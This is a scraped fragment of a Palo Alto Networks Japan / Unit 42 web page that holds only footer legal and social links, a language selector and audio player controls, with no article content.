* [個人情報の販売および共有禁止](https://panwedd.exterro.net/portal/dsar.htm?target=panwedd)
  ![Palo Alto Networks Logo](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/pan-logo-dark.svg)

* [プライバシー](https://www.paloaltonetworks.jp/legal-notices/privacy)

* [トラスト センター](https://www.paloaltonetworks.jp/legal-notices/trust-center)

* [利用規約](https://www.paloaltonetworks.jp/legal-notices/terms-of-use)

* [ドキュメント](https://www.paloaltonetworks.jp/legal-notices)

Copyright © 2026 Palo Alto Networks. All Rights Reserved

* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/youtube-black.svg)](https://www.youtube.com/user/paloaltonetworks)
* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/twitter-x-black.svg)](https://twitter.com/PaloAltoNtwks)
* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/facebook-black.svg)](https://www.facebook.com/PaloAltoNetworks/)
* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/linkedin-black.svg)](https://www.linkedin.com/company/palo-alto-networks)
* [![](https://www.paloaltonetworks.jp/content/dam/pan/en_US/images/icons/podcast.svg)](https://unit42.paloaltonetworks.com/unit-42-threat-vector-podcast/)
* JP  
  Select your language  
  ![Play](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg) ![Pause](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg) ![Minimize](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg) ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg)

### Default Heading

Read the article ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg)  
Seekbar

![Play](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg) ![Pause](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg)  
![Volume](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-volume.svg)  
Volume
![Minimize](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg)
